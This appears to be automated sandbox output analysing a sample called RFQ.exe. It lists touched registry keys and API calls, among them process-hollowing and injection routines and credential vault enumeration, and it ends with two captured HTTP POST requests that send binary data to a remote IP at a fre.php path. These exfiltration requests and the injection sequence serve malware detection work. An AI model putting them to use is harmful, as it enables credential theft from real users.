HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\SidType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\Level
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\ControlGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\MaxSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\MaxSizeUpper
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\Retention
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\AutoBackupLogFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\File
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\FilterId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\Isolation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\OwningPublisher
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\ChannelAccess
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\Config\ServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\CLResolutionInterval
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\DisplayInterval
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\SkipWatson
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RADAR\HeapLeakDetection\Settings\ReflectionInterval

Nothing to display

Nothing to display

Global\CLR_CASOFF_MUTEX
D448845E628773E4A9A809DA

advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryInfoKeyW
advapi32.dll.RegEnumKeyExW
advapi32.dll.RegEnumValueW
advapi32.dll.RegCloseKey
advapi32.dll.RegQueryValueExW
kernel32.dll.FlsAlloc
kernel32.dll.FlsFree
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.InitializeCriticalSectionEx
kernel32.dll.CreateEventExW
kernel32.dll.CreateSemaphoreExW
kernel32.dll.SetThreadStackGuarantee
kernel32.dll.CreateThreadpoolTimer
kernel32.dll.SetThreadpoolTimer
kernel32.dll.WaitForThreadpoolTimerCallbacks
kernel32.dll.CloseThreadpoolTimer
kernel32.dll.CreateThreadpoolWait
kernel32.dll.SetThreadpoolWait
kernel32.dll.CloseThreadpoolWait
kernel32.dll.FlushProcessWriteBuffers
kernel32.dll.FreeLibraryWhenCallbackReturns
kernel32.dll.GetCurrentProcessorNumber
kernel32.dll.GetLogicalProcessorInformation
kernel32.dll.CreateSymbolicLinkW
kernel32.dll.EnumSystemLocalesEx
kernel32.dll.CompareStringEx
kernel32.dll.GetDateFormatEx
kernel32.dll.GetLocaleInfoEx
kernel32.dll.GetTimeFormatEx
kernel32.dll.GetUserDefaultLocaleName
kernel32.dll.IsValidLocaleName
kernel32.dll.LCMapStringEx
kernel32.dll.GetTickCount64
advapi32.dll.EventRegister
mscoree.dll.#142
mscoreei.dll.RegisterShimImplCallback
mscoreei.dll.OnShimDllMainCalled
mscoreei.dll._CorExeMain
shlwapi.dll.UrlIsW
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
kernel32.dll.InitializeCriticalSectionAndSpinCount
kernel32.dll.IsProcessorFeaturePresent
msvcrt.dll._set_error_mode
msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z
kernel32.dll.FindActCtxSectionStringW
kernel32.dll.GetSystemWindowsDirectoryW
mscoree.dll.GetProcessExecutableHeap
mscoreei.dll.GetProcessExecutableHeap
mscorwks.dll._CorExeMain
mscorwks.dll.GetCLRFunction
advapi32.dll.RegisterTraceGuidsW
advapi32.dll.UnregisterTraceGuids
advapi32.dll.GetTraceLoggerHandle
advapi32.dll.GetTraceEnableLevel
advapi32.dll.GetTraceEnableFlags
advapi32.dll.TraceEvent
mscoree.dll.IEE
mscoreei.dll.IEE
mscorwks.dll.IEE
mscoree.dll.GetStartupFlags
mscoreei.dll.GetStartupFlags
mscoree.dll.GetHostConfigurationFile
mscoreei.dll.GetHostConfigurationFile
mscoreei.dll.GetCORVersion
mscoree.dll.GetCORSystemDirectory
mscoreei.dll.GetCORSystemDirectory_RetAddr
mscoreei.dll.CreateConfigStream
ntdll.dll.RtlUnwind
kernel32.dll.IsWow64Process
advapi32.dll.AllocateAndInitializeSid
advapi32.dll.OpenProcessToken
advapi32.dll.GetTokenInformation
advapi32.dll.InitializeAcl
advapi32.dll.AddAccessAllowedAce
advapi32.dll.FreeSid
kernel32.dll.AddVectoredContinueHandler
kernel32.dll.RemoveVectoredContinueHandler
advapi32.dll.ConvertSidToStringSidW
shell32.dll.SHGetFolderPathW
kernel32.dll.GetWriteWatch
kernel32.dll.ResetWriteWatch
kernel32.dll.CreateMemoryResourceNotification
kernel32.dll.QueryMemoryResourceNotification
kernel32.dll.QueryActCtxW
kernel32.dll.GetVersionExW
kernel32.dll.GetFullPathNameW
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
ole32.dll.CoGetContextToken
advapi32.dll.CryptAcquireContextA
advapi32.dll.CryptReleaseContext
advapi32.dll.CryptCreateHash
advapi32.dll.CryptDestroyHash
advapi32.dll.CryptHashData
advapi32.dll.CryptGetHashParam
advapi32.dll.CryptImportKey
advapi32.dll.CryptExportKey
advapi32.dll.CryptGenKey
advapi32.dll.CryptGetKeyParam
advapi32.dll.CryptDestroyKey
advapi32.dll.CryptVerifySignatureA
advapi32.dll.CryptSignHashA
advapi32.dll.CryptGetProvParam
advapi32.dll.CryptGetUserKey
advapi32.dll.CryptEnumProvidersA
mscoree.dll.GetMetaDataInternalInterface
mscoreei.dll.GetMetaDataInternalInterface
mscorwks.dll.GetMetaDataInternalInterface
mscorjit.dll.getJit
kernel32.dll.GetUserDefaultUILanguage
kernel32.dll.SetErrorMode
kernel32.dll.GetFileAttributesExW
mscoreei.dll.LoadLibraryShim
culture.dll.ConvertLangIdToCultureName
kernel32.dll.lstrlen
kernel32.dll.lstrlenW
mscoree.dll.ND_RI4
mscoreei.dll.ND_RI4
kernel32.dll.VirtualProtect
kernel32.dll.GlobalMemoryStatusEx
kernel32.dll.GetEnvironmentVariableW
kernel32.dll.SwitchToThread
kernel32.dll.CloseHandle
kernel32.dll.GetCurrentProcessId
advapi32.dll.LookupPrivilegeValueW
kernel32.dll.GetCurrentProcess
advapi32.dll.AdjustTokenPrivileges
kernel32.dll.OpenProcess
psapi.dll.EnumProcessModules
psapi.dll.GetModuleInformation
psapi.dll.GetModuleBaseNameW
psapi.dll.GetModuleFileNameExW
kernel32.dll.GetProcAddress
kernel32.dll.DebugActiveProcess
kernel32.dll.WaitForDebugEvent
kernel32.dll.ContinueDebugEvent
kernel32.dll.DeleteFileA
advapi32.dll.SetKernelObjectSecurity
advapi32.dll.GetKernelObjectSecurity
ntdll.dll.NtSetInformationProcess
ntdll.dll.NtProtectVirtualMemory
kernel32.dll.VirtualAllocEx
kernel32.dll.GetThreadContext
kernel32.dll.Wow64GetThreadContext
ntdll.dll.NtUnmapViewOfSection
kernel32.dll.ResumeThread
kernel32.dll.SetThreadContext
kernel32.dll.Wow64SetThreadContext
kernel32.dll.WriteProcessMemory
kernel32.dll.ReadProcessMemory
kernel32.dll.TerminateProcess
kernel32.dll.CreateProcessW
ole32.dll.CoUninitialize
kernel32.dll.CreateActCtxW
kernel32.dll.AddRefActCtx
kernel32.dll.ReleaseActCtx
kernel32.dll.ActivateActCtx
kernel32.dll.DeactivateActCtx
kernel32.dll.GetCurrentActCtx
advapi32.dll.EventUnregister
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptHashData
cryptsp.dll.CryptGetHashParam
cryptsp.dll.CryptDestroyHash
cryptsp.dll.CryptReleaseContext
vaultcli.dll.VaultEnumerateItems
vaultcli.dll.VaultEnumerateVaults
vaultcli.dll.VaultFree
vaultcli.dll.VaultGetItem
vaultcli.dll.VaultOpenVault
vaultcli.dll.VaultCloseVault
sechost.dll.LookupAccountSidLocalW
netapi32.dll.NetUserGetInfo
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptSetKeyParam
cryptsp.dll.CryptDecrypt
cryptsp.dll.CryptDestroyKey
ole32.dll.CoInitializeSecurity
sechost.dll.LookupAccountNameLocalW
advapi32.dll.LookupAccountSidW
ole32.dll.CoCreateInstance
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
fntcache.dll.ServiceMain
fntcache.dll.SvchostPushServiceGlobals
ntmarta.dll.GetMartaExtensionInterface
wkscli.dll.NetGetJoinInformation
netutils.dll.NetApiBufferFree
uxtheme.dll.ThemeInitApiHook
user32.dll.IsProcessDPIAware
dwmapi.dll.DwmIsCompositionEnabled
rpcrt4.dll.UuidFromStringW
radarrs.dll.WdiDiagnosticModuleMain
radarrs.dll.WdiHandleInstance
radarrs.dll.WdiGetDiagnosticModuleInterfaceVersion

"C:\Users\Seven01\AppData\Local\Temp\RFQ.exe"
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation

VaultSvc

Nothing to display

2 HTTP Request(s) detected

POST /~blackdia/vic/bless/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 89.187.86.7
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 84C65348
Content-Length: 192
Connection: close

POST /~blackdia/vic/bless/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 89.187.86.7
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 84C65348
Content-Length: 165
Connection: close